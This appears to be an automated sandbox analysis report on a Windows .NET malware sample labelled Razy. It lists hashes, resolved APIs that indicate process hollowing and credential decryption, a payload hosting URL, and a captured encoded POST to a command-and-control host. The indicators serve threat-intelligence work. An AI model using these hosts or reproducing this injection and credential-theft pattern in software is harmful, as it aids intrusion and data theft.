MalScore
100/100
MalFamily
Razy

run1.exe

File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 237.50 KB (243200 bytes)
Compile time: 2018-05-09 23:13:38
MD5: b288b4599cd44b337aaf87da50fe038b
SHA1: 1793bb34feeabf2fa96bec39a6ad2457f6a1e413
SHA256: 864d4f206e8dc5ece44c26f9b8718c1bfa6d28ea46db724aac90b56c8412da5e
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-05-21 16:51:06
Last submission: 2018-05-21 16:51:06
Filename detected: - run1.exe (1)
URL file hosting
hXXp://ncase.website/load/uk/run1.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-05-21 12:07:47 [26/65] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x3af74 241664 d7bf4d1e9accd4abe820f00316396d9e 675b2e5680f94fdc585d5fbc4f9081d541908019
.rsrc 0x3e000 0x12c 512 76606f51964e42cdc0cb61df1fa89b8c 294994c82e323fa5c7ba661b0772a4d804aa034f
.reloc 0x40000 0xc 512 427700847a9f85f4ed7cf27c47f63456 e781c321d6e476c122c838c592da8d9dad84a035
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x3e0a0 120 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x3e118 20 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
No Meta found in this file
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-21 16:49:16 2018-05-21 16:52:08 172

6 Behaviors detected by system signatures

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.config
C:\Users\Seven01\AppData\Local\Temp\run1.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\run1.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources\ncrypt.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources\ncrypt.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.32442968
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.32442968
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2324.32443031
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.config
C:\Users\Seven01\AppData\Local\Temp\run1.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll

Write Files

Nothing to display

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.32442968
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.32442968
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2324.32443031

Keys


Read Keys


Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
A984gyusiggffvvgv

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
crypt32.dll.CryptUnprotectData
crtdll.dll.wcscmp
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdiplusShutdown
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipSaveImageToStream
ole32.dll.CreateStreamOnHGlobal
ole32.dll.GetHGlobalFromStream
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.GetComputerNameW
kernel32.dll.GlobalMemoryStatus
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.GetFileAttributesW
kernel32.dll.CreateMutexA
kernel32.dll.GetLastError
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.LocalFree
kernel32.dll.GetTickCount
kernel32.dll.CopyFileW
kernel32.dll.FindClose
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.GetModuleFileNameW
kernel32.dll.SetDllDirectoryW
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLocalTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.RemoveDirectoryW
kernel32.dll.DeleteFileW
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetDriveTypeA
advapi32.dll.GetUserNameW
advapi32.dll.RegCreateKeyExW
advapi32.dll.LookupAccountSidA
advapi32.dll.CreateProcessAsUserW
advapi32.dll.CheckTokenMembership
advapi32.dll.RegOpenKeyW
advapi32.dll.RegEnumKeyW
user32.dll.EnumDisplayDevicesW
user32.dll.wvsprintfA
user32.dll.GetKeyboardLayoutList
shell32.dll.ShellExecuteW
sechost.dll.LookupAccountSidLocalA
wsock32.dll.WSAStartup
wsock32.dll.gethostbyname
wsock32.dll.socket
wsock32.dll.send
wsock32.dll.recv
wsock32.dll.htons
wsock32.dll.connect
wsock32.dll.closesocket

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\run1.exe"

Started Services

Nothing to display

Created Services

Nothing to display

Behavior analysis details

Machine name | Machine label | Machine manager | Started | Ended | Duration
Seven02_64 | Seven02_64 | VirtualBox | 2018-05-21 16:49:16 | 2018-05-21 16:52:08 | 172

1 HTTP Request(s) detected

http://hhamay.website/v31/index.php
  • Hostname: hhamay.website
  • IP Address: 198.54.126.109
  • Port: 80
  • Count: 1

POST /v31/index.php HTTP/1.0
Host: hhamay.website
Connection: close
Content-Length: 96
Accept-Language: en-US
Content-Type: application/octet-stream

\x99LB\x9dOQ\xc3\x0c\x05\xc8\x0c\x05\xce\x0c\x05\xc8m\x13\xcd\x19s\xbd\x0c\x04\xba\x0c\x05\xc9\x0c\x05\xc9\x0c\x05\xccm\x13\xcd\x1f\x13\xcd\x1e\x13\xcd\x10t\xdb\x1br\xbch\x13\xcd\x1cr\xb8\x0c\x05\xc6h\x13\xcd\x19\x13\xccm\x13\xcd\x11\x13\xcd\x10r\xbfhu\xba\x0c\x05\xc6\x0c\x04\xbam\x13\xcd\x1a\x13\xcd\x1cp\xb8\x0c\x05\xc8hu

#infosec #automation

TheSystem Itself @ 2018-05-21 16:51:22

Detected family: #Razy

TheSystem Itself @ 2018-05-21 17:06:02